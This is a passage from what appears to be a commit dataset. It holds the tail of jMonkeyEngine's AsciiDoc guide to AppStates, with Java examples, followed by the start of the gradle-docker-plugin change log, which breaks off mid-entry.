AbstractAppState)\n\na|isEnabled()\na|Test whether AppState is enabled or disabled. Your implementation should consider the boolean. (See AbstractAppState)\n\na|stateAttached(asm) +\nstateDetached(asm)\na|The AppState knows when it is attached to, or detached from, the AppStateManager, and triggers these two methods. Don't modify the scene graph from here! (Typically not used.)\n\na|render(RenderManager rm)\na|Renders the state, plus your optional customizations. (Typically not used.)\n\na|postRender()\na|Called after all rendering commands are flushed, including your optional customizations. (Typically not used.)\n\n|===\n\n\n== AbstractAppState\n\nThe link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-core\/src\/main\/java\/com\/jme3\/app\/state\/AbstractAppState.java[AbstractAppState] class already implements some common methods (`isInitialized(), setEnabled(), isEnabled()`) and makes creation of custom AppStates a bit easier. We recommend you extend AbstractAppState and override the remaining AppState methods: `initialize(), setEnabled(), cleanup()`.\n\nDefinition:\n\n[source,java]\n----\npublic class MyAppState extends AbstractAppState {\n\n private SimpleApplication app;\n\n private Node x = new Node(\"x\"); \/\/ some custom class fields...\n public Node getX(){ return x; } \/\/ some custom methods...\n\n @Override\n public void initialize(AppStateManager stateManager, Application app) {\n super.initialize(stateManager, app);\n this.app = (SimpleApplication)app; \/\/ cast to a more specific class\n\n \/\/ init stuff that is independent of whether state is PAUSED or RUNNING\n this.app.getRootNode().attachChild(getX()); \/\/ modify scene graph...\n this.app.doSomething(); \/\/ call custom methods...\n }\n\n @Override\n public void cleanup() {\n super.cleanup();\n \/\/ unregister all my listeners, detach all my nodes, etc...\n this.app.getRootNode().detachChild(getX()); \/\/ modify scene graph...\n this.app.doSomethingElse(); \/\/ call custom methods...\n }\n\n @Override\n public void setEnabled(boolean enabled) {\n \/\/ Pause and unpause\n super.setEnabled(enabled);\n if(enabled){\n \/\/ init stuff that is in use while this state is RUNNING\n this.app.getRootNode().attachChild(getX()); \/\/ modify scene graph...\n this.app.doSomethingElse(); \/\/ call custom methods...\n } else {\n \/\/ take away everything not needed while this state is PAUSED\n ...\n }\n }\n\n \/\/ Note that update is only called while the state is both attached and enabled.\n @Override\n public void update(float tpf) {\n \/\/ do the following while game is RUNNING\n this.app.getRootNode().getChild(\"blah\").scale(tpf); \/\/ modify scene graph...\n x.setUserData(...); \/\/ call some methods...\n }\n\n}\n----\n\n\n== BaseAppState\n\n\nA new link:{link-javadoc}\/app\/state\/BaseAppState.html[BaseAppState] class was introduced as part of the link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine-3-1-alpha-4-released\/35478[updates] being made to the AppState interface. AbstractAppState is the most minimal of the minimal implementations of the AppState interface. You essentially still need to do everything yourself, including getting the funky enable\/disable\/initialized\/terminate logic right. Now you just extend BaseAppState and you get onEnable() and onDisable() already worked out for you.\n\nDefinition:\n\n[source,java]\n----\npublic class MyBaseAppState extends BaseAppState {\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\n @Override\u00a0\u00a0\u00a0\n protected void initialize(Application app) {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/It is technically safe to do all initialization and cleanup in the \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/onEnable()\/onDisable() methods. Choosing to use initialize() and \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/cleanup() for this is a matter of performance specifics for the \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/implementor.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/TODO: initialize your AppState, e.g. attach spatials to rootNode\u00a0\u00a0\u00a0\n }\n\n @Override\u00a0\u00a0\u00a0\n protected void cleanup(Application app) {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/TODO: clean up what you initialized in the initialize method,\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/e.g. remove all spatials from rootNode\u00a0\u00a0\u00a0\n }\n\n \u00a0 \/\/onEnable()\/onDisable() can be used for managing things that should \u00a0\u00a0\u00a0\n \/\/only exist while the state is enabled. Prime examples would be scene \u00a0\u00a0\u00a0\n \/\/graph attachment or input listener attachment.\u00a0\u00a0\u00a0\n @Override\u00a0\u00a0\u00a0\n protected void onEnable() {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/Called when the state is fully enabled, ie: is attached and \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/isEnabled() is true or when the setEnabled() status changes after the \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/state is attached.\u00a0\u00a0\u00a0\n }\n \u00a0 \u00a0\n \u00a0 @Override\u00a0\u00a0\u00a0\n protected void onDisable() {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/Called when the state was previously enabled but is now disabled \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/either because setEnabled(false) was called or the state is being \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/cleaned up.\u00a0\u00a0\u00a0\n }\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\n\n @Override\u00a0\u00a0\u00a0\n public void update(float tpf) {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/TODO: implement behavior during runtime\u00a0\u00a0\u00a0\n }\n \u00a0 \u00a0\n}\n----\n\nNotable BaseAppState changes are as follows:\n\n\n* You no longer need to call super.initialize(stateManager, app) because it is now called by BaseAppState upon initialization for you.\n* You no longer have to cast SimpleApplication to have access to AssetManager, AppStateManager, and you can even get a State directly. The getters getApplication(), getAssetManager(), getState(type) and their methods are available to you immediately. However, you still have to cast SimpleApplication to get rootNode.\n* You no longer call super during cleanup, its done for you now.\n* It's now safe to do all initialization and cleanup in the onEnable()\/onDisable() methods.\n* Cleanup and setEnabled now have logging built in.\n\nYou use BaseAppState as you would AbstractAppState, other than mentioned above, and which one you use is entirely up to you. However, BaseAppState makes your life easier and is the recommended one to use now.\n\nSee link:http:\/\/javadoc.jmonkeyengine.org\/com\/jme3\/app\/state\/BaseAppState.html[BaseAppState] for more information.\n\n== Pausing and Unpausing\n\nYou define what an AppState does when Paused or Unpaused, in the `setEnabled()` and `update()` methods. Call `myState.setEnabled(false)` on all states that you want to pause. Call `myState.setEnabled(true)` on all states that you want to unpause.\n\n\n== AppStateManager\n\nThe com.jme3.app.state.AppStateManager holds the list of AppStates for an application. AppStateManager ensures that active AppStates can modify the scene graph, and that the update() loops of active AppStates is executed. There is one AppStateManager per application. You typically attach several AppStates to one AppStateManager, but the same state can only be attached once.\n[cols=\"2\", options=\"header\"]\n|===\n\na|AppStateManager Method\na|Usage\n\na|hasState(myState)\na|Is AppState object 'myState' attached?\n\na|getState(MyAppState.class)\na|Returns the first attached state that is an instance of a subclass of `MyAppState.class`.\n\n|===\n\nThe AppStateManager's `render(), postRender(), cleanup()` methods are internal, ignore them, users never call them directly.\n\n* If a detached AppState is attached then initialize() will be called on the following render pass.\n* If an attached AppState is detached then cleanup() will be called on the following render pass.\n* If you attach an already-attached AppState then the second attach is a no-op and will return false.\n* If you both attach and detach an AppState within one frame then neither initialize() or cleanup() will be called, although if either is called both will be.\n* If you both detach and then re-attach an AppState within one frame then on the next update pass its cleanup() and initialize() methods will be called in that order.\n\n\n== Best Practices\n\n\n=== Communication Among AppStates\n\nYou can only access other AppStates (read from and write to them) from certain places: From a Control's update() method, from an AppState's update() method, and from the SimpleApplication's simpleUpdate() loop. Don't mess with the AppState from other places, because from other methods you have no control over the order of modifications; the game can go out of sync because you can't know when (during which half-finished step of another state change) your modification will be performed.\n\nYou can use custom accessors to get data from AppStates, to set data in AppStates, or to trigger methods in AppStates.\n\n[source,java]\n----\nthis.app.getStateManager().getState(MyAppState.class).doSomeCustomStuffInThisState();\n----\n\n\n=== Initialize Familiar Class Fields\n\nTo access class fields of the SimpleApplication the way you are used to, initialize them to local variables, as shown in the following AppState template:\n\n[source,java]\n----\n\nprivate SimpleApplication app;\nprivate Node rootNode;\nprivate AssetManager assetManager;\nprivate AppStateManager stateManager;\nprivate InputManager inputManager;\nprivate ViewPort viewPort;\nprivate BulletAppState physics;\n\npublic class MyAppState extends AbstractAppState {\n @Override\n public void initialize(AppStateManager stateManager, Application app) {\n super.initialize(stateManager, app);\n this.app = (SimpleApplication) app; \/\/ can cast Application to something more specific\n this.rootNode = this.app.getRootNode();\n this.assetManager = this.app.getAssetManager();\n this.stateManager = this.app.getStateManager();\n this.inputManager = this.app.getInputManager();\n this.viewPort = this.app.getViewPort();\n this.physics = this.stateManager.getState(BulletAppState.class);\n }\n}\n\n----\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"11271bb2f37d488365c00fc00864c809595474eb","subject":"Add change to release notes","message":"Add change to release notes\n","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"== Change Log\n\n[discrete]\n=== v6.1.0 (TBA)\n\n* Allow configuring the main class name for convention plugins - {uri-github}\/pull\/892[PR 892]\n\n[discrete]\n=== v6.0.0 (November 16, 2019)\n\n* **Breaking Change!** Multi-tag support for push operation and convention plugins - {uri-github}\/pull\/867[PR 867]\n* **Breaking Change!** Renamed property `tags` to `images` for extensions `DockerJavaApplication` and `DockerSpringBootApplication`.\n* **Breaking Change!** Renamed property `tag` to `image` for custom tasks `DockerBuildImage`, `DockerCommitImage`, `DockerPullImage`, `DockerSaveImage`, `DockerListImages`,`DockerCreateContainer`.\n* **Breaking Change!** Removal of method `DockerPullImage.getImageId()`. Use `DockerPullImage.getImage()` instead.\n* **Breaking Change!** Host-related configuration properties in `DockerCreateContainer` have been moved to nested property for better maintainability - {uri-github}\/pull\/873[PR 873]\n* Add properties `ipcMode` and `sysctls` to `DockerCreateContainer` - {uri-github}\/pull\/862[PR 862]\n* Gradle 6.0 compatibility fixes - {uri-github}\/pull\/869[PR 869]\n* Improve DSL for configuring registry credentials for custom tasks - {uri-github}\/pull\/879[PR 879]\n* Plugin resolves and uses Docker credential helper - {uri-github}\/pull\/865[PR 865]\n* Upgrade of Docker Java library to version 3.1.5\n\n[discrete]\n=== v5.3.0 (October 30, 2019)\n\n* Expose project-prop\/sys-prop\/env-var to optionally use netty-exec-cmd-factory - {uri-github}\/pull\/876[PR 876]\n\n[discrete]\n=== v5.2.0 (October 5, 2019)\n\n* **Potentially Breaking Change!** Remove duplicated code in convention plugins - {uri-github}\/pull\/864[PR 864]\n* Restore compatibility with Gradle 5.1 as runtime version - {uri-github}\/issue\/866[Issue 866]\n\n[discrete]\n=== v5.1.0 (September 18, 2019)\n\n* **Potentially Breaking Change!** Remove remaining use of Application Plugin in convention plugins - {uri-github}\/pull\/852[PR 852]\n\n[discrete]\n=== v5.0.0 (August 13, 2019)\n\n* **Breaking Change!** Remove exec\/cmd hooks in Docker application plugin - {uri-github}\/pull\/806[PR 806]\n* **Breaking Change!** API cleanup of Dockerfile task - {uri-github}\/pull\/812[PR 812]\n* **Breaking Change!** Removed `ItemJoiner` from public API - {uri-github}\/pull\/836[PR 836]\n* Respect symlinks in build context - {uri-github}\/issue\/837[Issue 837]\n\n[discrete]\n=== v4.10.0 (June 12, 2019)\n\n* Expose `target` property for BuildImageTask - {uri-github}\/pull\/813[PR 813]\n* Remove final from DockerBuildImage.labels property - {uri-github}\/pull\/823[PR 823]\n* Always set imageId within DockerBuildImage on success - {uri-github}\/pull\/819[PR 819]\n\n[discrete]\n=== v4.9.0 (May 25, 2019)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is not inject into the method `runRemoteCommand` anymore - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix gradle `5.x` deprecation warnings - {uri-github}\/issues\/782[Issue 782]\n* Bump `docker-java` to `3.1.2` - {uri-github}\/issues\/787[Issue 787]\n\n[discrete]\n=== v4.6.2 (March 9, 2019)\n\n* Add shaded JAF dependency to simplify usage of plugin with Java 11 - {uri-github}\/issues\/764[Issue 764]\n\n[discrete]\n=== v4.6.1 (March 6, 2019)\n\n* Fix setting binds in `DockerCreateContainer` task - {uri-github}\/issues\/758[Issue 758]\n\n[discrete]\n=== v4.6.0 (March 3, 2019)\n\n* **Breaking Change!** Plugin declares and uses Docker Java as runtime library - {uri-github}\/pull\/751[PR 751]\n* **Breaking Change!** Custom task `DockerClient` has been renamed to `DockerOperation` to avoid conflicting Docker Java class name\n* Shade plugin dependencies except Docker Java - {uri-github}\/pull\/755[PR 755]\n\n[discrete]\n=== v4.5.0 (February 19, 2019)\n\n* `Dockerfile.FileInstruction` does not use flags if `Dockerfile.File` is passed in using a `Provider` - {uri-github}\/pull\/753[PR 753]\n* Inline main class finder and avoid explicit dependency on Spring Boot - {uri-github}\/pull\/752[PR 752]\n\n[discrete]\n=== v4.4.1 (February 5, 2019)\n\n* Cannot set publishAll property without error - {uri-github}\/pull\/742[PR 742]\n\n[discrete]\n=== v4.4.0 (January 31, 2019)\n\n* **Breaking Change!** Define image with more fine-grained image layers - {uri-github}\/pull\/736[PR 736]\n* Bump _docker-java-shaded_ to latest version - {uri-github}\/pull\/729[PR 729]\n* Task `DockerCreateContainer` gained option `groups` - {uri-github}\/pull\/731[Pull Request 731]\n\n[discrete]\n=== v4.3.0 (January 12, 2019)\n\n* **Breaking Change!** The task `DockerLoadImage` should use `Provider` type for image file\n* **Breaking Change!** Use the default value `$buildDir\/docker` for `DockerBuildImage.inputDir` to align with the default directory of the `Dockerfile` task\n* **Breaking Change!** Align task names in `DockerJavaApplicationPlugin` with the ones from the `DockerSpringBootApplicationPlugin`\n* Examples in user guide that demonstrate the creation of a custom Docker task and the modification of existing `Dockerfile` instructions\n\n[discrete]\n=== v4.2.0 (December 16, 2018)\n\n* Applying the Docker Spring Boot application plugin with the plugins DSL should not fail - {uri-github}\/issues\/702[Issue 702]\n* **Breaking Change!** Remove all deprecations - {uri-github}\/issues\/675[Issue 675]\n** Removed `DockerCreateContainer.env`, replaced by `DockerCreateContainer.envVars`\n** Removed `DockerBuildImage.tag`, replaced by `DockerBuildImage.tags`\n** Removed `DockerExecContainer.cmd`, replaced by `DockerExecContainer.commands`\n** Removed `DockerExecContainer.execId`, replaced by `DockerExecContainer.execIds`\n* `DockerBuildImage.tags.add\/addAll` only work after using `tags.set` - {uri-github}\/issues\/712[Issue 712]\n* User guide sample on Docker `links` should not use `doFirst` - {uri-github}\/issues\/715[Issue 715]\n* `DockerCommitImage` task should not fail when accessing container ID property value - {uri-github}\/issues\/718[Issue 718]\n\n[discrete]\n=== v4.1.0 (November 29, 2018)\n\n* Ensure compatibility with Gradle 5.0 - {uri-github}\/pull\/693[Pull Request 709]\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature]\n\n[discrete]\n=== v4.0.5 (November 22, 2018)\n\n* Avoid the use of application plugin extension to ensure compatibility - {uri-github}\/issues\/706[Issue 706]\n\n[discrete]\n=== v4.0.4 (November 4, 2018)\n\n* Implementation to make `DockerBuildImage` task incremental and cacheable is not sufficient - {uri-github}\/issues\/697[Issue 697]\n\n[discrete]\n=== v4.0.3 (October 30, 2018)\n\n* Correctly handle the case where `inputDir` is not where `dockerFile` is located - {uri-github}\/pull\/693[Pull Request 693]\n\n[discrete]\n=== v4.0.2 (October 27, 2018)\n\n* Output file name containing the image ID created by `DockerBuildImage` should work on Windows - {uri-github}\/pull\/690[Pull Request 690]\n\n[discrete]\n=== v4.0.1 (October 20, 2018)\n\n* Returned image ID for a `DockerBuildImage` task should never be null - {uri-github}\/pull\/687[Pull Request 687]\n\n[discrete]\n=== v4.0.0 (October 12, 2018)\n\n* **Breaking Change!** Use `Provider` concept throughout to support lazy evaluation via public API - {uri-github}\/pull\/659[Pull Request 659]\n* **Breaking Change!** Consumers of this plugin will have to use Java 8 or higher - {uri-github}\/pull\/676[Pull Request 676]\n* **Breaking Change!** Removal of `AbstractReactiveStreamsTask` from inherited custom task hierarchy\n* __NEW__ Add tested, multi-lingual user guide - {uri-github}\/pull\/677[Pull Request 677]\n* __NEW__ Make `DockerBuildImage` task incremental and cacheable - {uri-github}\/pull\/672[Pull Request 672]\n* Introduce method for translating username\/password into a PasswordCredentials - {uri-github}\/pull\/668[Pull Request 668]\n* Add `@CompileStatic` to much of the code base that can support it - {uri-github}\/pull\/676[Pull Request 676]\n* Use appropriate types for Groovy\/Kotlin DSL interoperability for reactive streams functionality - {uri-github}\/pull\/678[Pull Request 678]\n\n[discrete]\n=== v3.6.2 (October 2, 2018)\n\n* `DockerCreateContainer` gained `pid` option - {uri-github}\/pull\/652[Pull Request 652]\n* `Dockerfile` validation takes into account comments - {uri-github}\/issues\/657[Issue 657]\n* Bump `docker-java-shaded` to `rc-5` - {uri-github}\/issues\/660[Issue 660]\n* `DockerBuildImage` gained `network` option - {uri-github}\/issues\/608[Issue 608]\n* `DockerCreateContainer` gained `autoRemove` option - {uri-github}\/issues\/639[Issue 639]\n\n[discrete]\n=== v3.6.1 (August 21, 2018)\n\n* Task `DockerClient`, and the passed dockerClient object, is now cached by configuration - {uri-github}\/pull\/644[Pull Request 644]\n* Task `DockerBuildImage` gained option `cacheFrom` - {uri-github}\/pull\/646[Pull Request 646]\n\n[discrete]\n=== v3.6.0 (August 7, 2018)\n\n* Use smaller base images for convention plugins - {uri-github}\/pull\/636[Pull Request 636]\n* Fully deprecate MAINTAINER instruction and replace with LABEL - {uri-github}\/pull\/635[Pull Request 635]\n* Make Dockerfile task cacheable via Gradle build cache - {uri-github}\/pull\/641[Pull Request 641]\n\n[discrete]\n=== v3.5.0 (July 24, 2018)\n\n* Support for dockerizing Spring Boot applications - {uri-github}\/pull\/619[Pull Request 619]\n* Removed deprecated `ResponseHandler` - {uri-github}\/pull\/624[Pull Request 624]\n* Introduce user guide for more readable, maintainable documentation - {uri-github}\/pull\/630[Pull Request 630]\n* Upgrade to Gradle Wrapper 4.9\n\n[discrete]\n=== v3.4.4 (July 15, 2018)\n\n* Task `DockerLivenessContainer` had its polling logic reworked to be more failure proof.\n\n[discrete]\n=== v3.4.3 (July 8, 2018)\n\n* Task `DockerCreateContainer` has its method `withEnvVars` changed to accept a `def`, which in turn can be anything (String, Integer, Closure, etc) but will eventually have all its keys\/values resolved to java strings. - {uri-github}\/pull\/616[Pull Request 617]\n* Task `DockerLivenessContainer` had minor verbiage changes to its output. - {uri-github}\/pull\/616[Pull Request 617]\n* Use `-all` wrapper to better integrate with IDE's. - {uri-github}\/pull\/616[Pull Request 617]\n\n[discrete]\n=== v3.4.2 (July 7, 2018)\n\n* Shade cglib and its dependencies. - {uri-github}\/pull\/616[Pull Request 616]\n* Bump `docker-java` to `3.1.0-rc-3`. - {uri-github}\/pull\/616[Pull Request 616]\n\n[discrete]\n=== v3.4.1 (July 3, 2018)\n\n* BUGFIX for task `DockerCreateContainer` where `envs` were not being properly honored. - {uri-github}\/pull\/614[Pull Request 614]\n\n[discrete]\n=== v3.4.0 (July 1, 2018)\n\n* Task `Dockerfile` now supports multi-stage builds - {uri-github}\/pull\/607[Pull Request 607]\n* When plugin is applied to sub-projects we will additionally search rootProject for repos to use - {uri-github}\/pull\/610[Pull Request 610]\n* Task `DockerCreateContainer` has deprecated `env` in favor of `envVars` which can ONLY be added to with a helper method `withEnvVar` that can be called **N** times for setting environment variables. - {uri-github}\/pull\/609[Pull Request 609]\n* Task `DockerLivenessProbeContainer` has been renamed to `DockerLivenessContainer`. It's `probe` method has been renamed to `livnessProbe`. Task `DockerExecStopContainer` had its `probe` method renamed to `execStopProbe`. - {uri-github}\/pull\/611[Pull Request 611]\n\n[discrete]\n=== v3.3.6 (June 23, 2018)\n\n* Task `DockerCopyFileToContainer` can now copy **N** number of files via methods `withFile` and `withTarFile`. - {uri-github}\/pull\/605[Pull request 605]\n\n[discrete]\n=== v3.3.5 (June 17, 2018)\n\n* Fix bug within `DockerExecContainer` when `exitCode` can be null (default to 0 if so). - {uri-github}\/pull\/602[Pull request 602]\n\n[discrete]\n=== v3.3.4 (June 16, 2018)\n\n* Task `DockerExecContainer` gained ability to specify multiple execution commands to be run. - {uri-github}\/pull\/600[Pull request 600]\n* Various tasks had their progress logger output cleaned up. - {uri-github}\/pull\/601[Pull request 601]\n\n[discrete]\n=== v3.3.3 (June 8, 2018)\n\n* Explicitly call `toString()` on values in maps passed to Docker API. - {uri-github}\/pull\/595[Pull request 595]\n* Task `DockerLivenessProbeContainer` gained method `lastInspection()` which will return the last \"docker inspect container\" response AFTER execution has completed. - {uri-github}\/pull\/596[Pull request 596]\n\n[discrete]\n=== v3.3.2 (June 5, 2018)\n\n* Task `DockerLivenessProbeContainer` now has the `probe` option set to optional and if NOT defined will fallback to checking if container is in a running state. - {uri-github}\/pull\/594[Pull request 594]\n\n[discrete]\n=== v3.3.1 (June 2, 2018)\n\n* Various minor refactorings surrounding new task `DockerExecStopContainer`. - {uri-github}\/pull\/592[Pull request 592]\n\n[discrete]\n=== v3.3.0 (June 1, 2018)\n\n* Added task `DockerClient` to pass the raw `docker-java` client to the `onNext` closure if defined. - {uri-github}\/pull\/589[Pull request 589]\n* Task `DockerCreateContainer` will now log the `containerName` if set, which is the standard within this plugin, otherwise fallback to the just created `containerId`.\n* Task `DockerExecContainer` gained option `successOnExitCodes` to allow user to define a list of successful exit codes the exec is allowed to return and will fail if not in list. Default behavior is to do no check. - {uri-github}\/pull\/590[Pull request 590]\n* Added task `DockerLivenessProbeContainer` which will poll, for some defined amount of time, a running containers logs looking for a given message and fail if not found. - {uri-github}\/pull\/587[Pull request 587]\n* Added task `DockerExecStopContainer` to allow the user to execute an arbitrary cmd against a container, polling for it to enter a non-running state, and if that does not succeed in time issue stop request. - {uri-github}\/pull\/591[Pull request 591]\n\n[discrete]\n=== v3.2.9 (May 22, 2018)\n\n* Fixed a bug in task `DockerCreateContainer` where option `cpuset` is now renamed differently in `docker-java`. - {uri-github}\/pull\/585[Pull request 585]\n\n[discrete]\n=== v3.2.8 (April 30, 2018)\n\n* Task `DockerExecContainer` gained option `user` to specify a user\/group. - {uri-github}\/pull\/574[Pull request 574]\n* Task `DockerCreateContainer` gained option `ipV4Address` to specify a specific ipv4 address to use. - {uri-github}\/pull\/449[Pull request 449]\n* Bump gradle to `4.7`. - {uri-github}\/pull\/578[Pull request 578]\n\n[discrete]\n=== v3.2.7 (April 19, 2018)\n\n* Task `DockerSaveImage` gained option `useCompression` to optionally gzip the created tar. - {uri-github}\/pull\/565[Pull request 565]\n* Add `javax.activation` dependency for users who are working with jdk9+. - {uri-github}\/pull\/572[Pull request 572]\n\n[discrete]\n=== v3.2.6 (March 31, 2018)\n\n* Cache `docker-java` client instead of recreating for every request\/task invocation. This is a somewhat big internal change but has a lot of consequences and so it was deserving of its own point release. - {uri-github}\/pull\/558[Pull request 558]\n\n[discrete]\n=== v3.2.5 (March 2, 2018)\n\n* Added `macAddress` option to task `DockerCreateContainer` - {uri-github}\/pull\/538[Pull request 538]\n* Initial work for `codenarc` analysis - {uri-github}\/pull\/537[Pull request 537]\n* Use of `docker-java-shaded` library in favor of `docker-java` proper to get around class-loading\/clobbering issues - {uri-github}\/pull\/550[Pull request 550]\n* Honor DOCKER_CERT_PATH env var if present - {uri-github}\/pull\/549[Pull request 549]\n* Task `DockerSaveImage` will now create file for you should it not exist - {uri-github}\/pull\/552[Pull request 552]\n* Task `DockerPushImage` will now include tag info in logging if applicable - {uri-github}\/pull\/554[Pull request 554]\n* !!!!! BREAKING: Property `inputStream` of task `DockerLoadImage` has been changed from type `InputStream` to `Closure<InputStream>`. This was done to allow scripts\/code\/pipelines to delay getting the image and side-step this property getting configured during gradles config-phase. - {uri-github}\/pull\/552[Pull request 552]\n\n[discrete]\n=== v3.2.4 (February 5, 2018)\n\n* Use openjdk as a default image in DockerJavaApplicationPlugin - {uri-github}\/pull\/528[Pull request 528]\n* Add `skipMaintainer` to `DockerJavaApplication` - {uri-github}\/pull\/529[Pull request 529]\n* Can now define `labels` in `DockerCreateContainer` task - {uri-github}\/pull\/530[Pull request 530]\n* Added task `DockerRenameContainer` - {uri-github}\/pull\/533[Pull request 533]\n\n[discrete]\n=== v3.2.3 (January 26, 2018)\n\n* If `DockerWaitHealthyContainer` is run on an image which was not built with `HEALTHCHECK` than fallback to using generic status - {uri-github}\/pull\/520[Pull request 520]\n\n[discrete]\n=== v3.2.2 (January 17, 2018)\n\n* Bump gradle to `4.3.1` - {uri-github}\/pull\/500[Pull request 500]\n* Bug fix for {uri-github}\/issues\/490[Issue 490] wherein `on*` reactive-stream closures are evaluated with null exception when using gradle-4.3 - {uri-github}\/commit\/93b80f2bd18c4f04d0f58443b45c59cb58a54e77[Commit 93b80f]\n* Support for zero exposed ports in `DockerJavaApplication` - {uri-github}\/pull\/504[Pull request 504]\n\n[discrete]\n=== v3.2.1 (November 22, 2017)\n\n* Bump gradle to `4.2` - {uri-github}\/pull\/471[Pull request 471]\n* Fix setting `shmSize` when creating container - {uri-github}\/pull\/480[Pull request 480]\n* Add support for entrypoint on `DockerCreateContainer` - {uri-github}\/pull\/479[Pull request 479]\n* Bump verison of docker-java to 3.0.14 - {uri-github}\/pull\/482[Pull request 482]\n* Added `DockerWaitHealthyContainer` task - {uri-github}\/pull\/485[Pull request 485]\n* Use groovy join function in favor or jdk8 join function. - {uri-github}\/pull\/498[Pull request 498]\n\n[discrete]\n=== v3.2.0 (September 29, 2017)\n\n* Update `createBind` to use docker-java `parse` method - {uri-github}\/pull\/452[Pull request 452]\n* Allow Docker to cache app libraries dir when `DockerJavaApplication` plugin is used - {uri-github}\/pull\/459[Pull request 459]\n\n[discrete]\n=== v3.1.0 (August 21, 2017)\n\n* `DockerListImages` gained better support for filters - {uri-github}\/pull\/414[Pull request 414]\n* Use `alpine:3.4` image in functional tests - {uri-github}\/pull\/416[Pull request 416]\n* `DockerBuildImage` and `DockerCreateContainer` gained optional argument `shmSize` - {uri-github}\/pull\/413[Pull request 413]\n* Added tasks `DockerInspectNetwork`, `DockerCreateNetwork`, and `DockerRemoveNetwork` - {uri-github}\/pull\/422[Pull request 422]\n* Add statically typed methods for configuring plugin with Kotlin - {uri-github}\/pull\/426[Pull request 426]\n* Fix `Dockerfile` task up-to-date logic - {uri-github}\/pull\/433[Pull request 433]\n* Multiple ENVs are not set the same way as single ENV instructions - {uri-github}\/pull\/415[Pull request 415]\n* `DockerCreateContainer` changed optional input `networkMode` to `network` to better align with docker standatds - {uri-github}\/pull\/440[Pull request 440]\n* The first instruction of a Dockerfile has to be FROM except for Docker versions later than 17.05 - {uri-github}\/pull\/435[Pull request 435]\n* Bump verison of docker-java to 3.0.13 - {uri-github}\/commit\/b2d93671ed0a0b7177a450d503c28eca6aa6795d[Commit b2d936]\n\n[discrete]\n=== v3.0.10 (July 7, 2017)\n\n* Bump verison of docker-java to 3.0.12 - {uri-github}\/pull\/408[Pull request 408]\n* Publish javadocs on new release - {uri-github}\/pull\/405[Pull request 405]\n\n[discrete]\n=== v3.0.9 (July 4, 2017)\n\n* Bump verison of docker-java to 3.0.11 - {uri-github}\/pull\/403[Pull request 403]\n* New release process - {uri-github}\/pull\/402[Pull request 402]\n\n[discrete]\n=== v3.0.8 (June 16, 2017)\n\n* Task `DockerPullImage` gained method `getImageId()` which returns the fully qualified imageId of the image that was just pulled - {uri-github}\/pull\/379[Pull request 379]\n* Task `DockerBuildImage` gained property `tags` which allows for multiple tags to be specified when building an image - {uri-github}\/pull\/380[Pull request 380]\n* Task `DockerCreateContainer` gained property `networkAliases` - {uri-github}\/pull\/384[Pull request 384]\n\n[discrete]\n=== v3.0.7 (May 17, 2017)\n\n* Invoke onNext closures call() method explicitly - {uri-github}\/pull\/368[Pull request 368]\n* Adds new task DockerInspectExecContainer which allows to inspect exec instance - {uri-github}\/pull\/362[Pull request 362]\n* `functionalTest`'s can now run against a native docker instance - {uri-github}\/pull\/369[Pull request 369]\n* `DockerLogsContainer` now preserves leading space - {uri-github}\/pull\/370[Pull request 370]\n* Allow customization of app plugin entrypoint\/cmd instructions - {uri-github}\/pull\/359[Pull request 359]\n* Task `Dockerfile` will no longer be forced as `UP-TO-DATE`, instead the onus will be put on developers to code this should they want this functionality. - {uri-github}\/issues\/357[Issue 357]\n* Now that `functionalTest`'s work natively, and in CI, 